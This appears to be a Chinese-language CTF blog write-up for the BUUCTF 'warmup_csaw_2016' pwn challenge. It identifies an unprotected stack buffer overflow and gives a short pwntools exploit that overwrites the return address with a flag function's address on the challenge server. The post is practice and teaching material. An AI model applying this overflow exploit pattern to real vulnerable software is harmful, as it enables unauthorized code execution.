ReStr0
Venom战队队员 Chamd5安全团队
ReStr0-Blog

BUUCTF warmup_csaw_2016

查看题目保护

https://blog.restro.cn/wp-content/uploads/2021/08/image.png

我们发现,一个保护都没有打开,接下来进行打开ida查看,相关代码

https://blog.restro.cn/wp-content/uploads/2021/08/image-2.png

这里可以看到,存在一个明显的栈溢出。v5缓冲区0x40,我们直接构建payload=”a”*0x40+”b”*0x8+p64(getflag)

https://blog.restro.cn/wp-content/uploads/2021/08/image-1.png

获取了getflag的函数地址记录下来

https://blog.restro.cn/wp-content/uploads/2021/08/image-3-1024x500.png

EXP

from pwn import *
#p = process("warmup_csaw_2016")
p = remote("node4.buuoj.cn","26179")
context(os="linux", arch="amd64", log_level="debug")
elf = ELF("warmup_csaw_2016")
system_addr = 0x40060D       
payload = b'a'*0x40 + b'b'*0x8+p64(system_addr)
p.sendline(payload)
p.interactive()

发表评论

textsms
account_circle
email

ReStr0-Blog

BUUCTF warmup_csaw_2016
查看题目保护 我们发现,一个保护都没有打开,接下来进行打开ida查看,相关代码 这里可以看到,存在一个明显的栈溢出。v5缓冲区0x40,我们直接构建payload="a"*0x40+"b"*0x…
扫描二维码继续阅读
2021-08-05